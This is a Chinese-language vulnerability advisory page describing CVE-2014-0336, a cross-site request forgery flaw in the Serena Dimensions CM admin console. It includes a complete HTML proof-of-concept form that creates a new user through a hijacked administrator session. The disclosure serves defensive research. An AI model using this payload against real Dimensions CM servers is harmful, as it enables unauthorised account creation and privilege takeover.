Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Serena Dimensions CM跨站请求伪造漏洞(CVE-2014-0336)

发布日期:2014-03-05
更新日期:2014-03-11受影响系统:
SERENA Software Inc Serena Dimensions CM
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65981
CVE(CAN) ID: CVE-2014-0336Serena Dimensions CM是基于进程的软件更改和配置管理解决方案。Serena Dimensions CM 12.2 Build 7.199.0及其他版本的Web客户端存在跨站请求伪造漏洞,这可使远程攻击者通过adminconsole/ URI的 user_new_master 参数,利用该漏洞劫持管理员身份验证请求,获取管理员权限。<*来源:Ken Cijsouw
 
  链接:http://www.kb.cert.org/vuls/id/823452
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Proof-of-Concept:
<html><!-- CSRF PoC --><body><form
action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
User&create=yes" method="POST">
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;dept" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;id" value="HACKTEST1" />
<input type="hidden" name="USER&#95;CURWORKSET" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" /><input type="hidden" name="iSUSErEdit" value="false" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;site" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;phone" value="" />
<input type="hidden" name="AUTOMATIC&#95;LOGIN" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;group&#95;id" value="" />
<input type="hidden" name="null" value="" />
<input type="hidden" name="DIALOG&#95;MODE" value="MODE&#37;5fCREATE" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;full&#95;name" value="HACKTEST1" /><input type="hidden" name="projectPicker" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />
<input type="hidden" name="wait&#95;until&#95;loaded" value="" />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS&#95;ASSIGNED" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;email"
value="ken1&#37;2ecijsouw&#37;40sincerus&#37;2enl" /><input type="submit" value="Submit request" />
</form>
</body>建议:
--------------------------------------------------------------------------------
厂商补丁:SERENA Software Inc
-------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/参考:http://cwe.mitre.org/data/definitions/79.html
http://cwe.mitre.org/data/definitions/352.html
http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/SpagoBI 持续性跨站脚本攻击漏洞Citrix NetScaler应用交付控制器本地信息泄露漏洞(CVE-2013-6940)相关资讯      Serena Dimensions CM  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或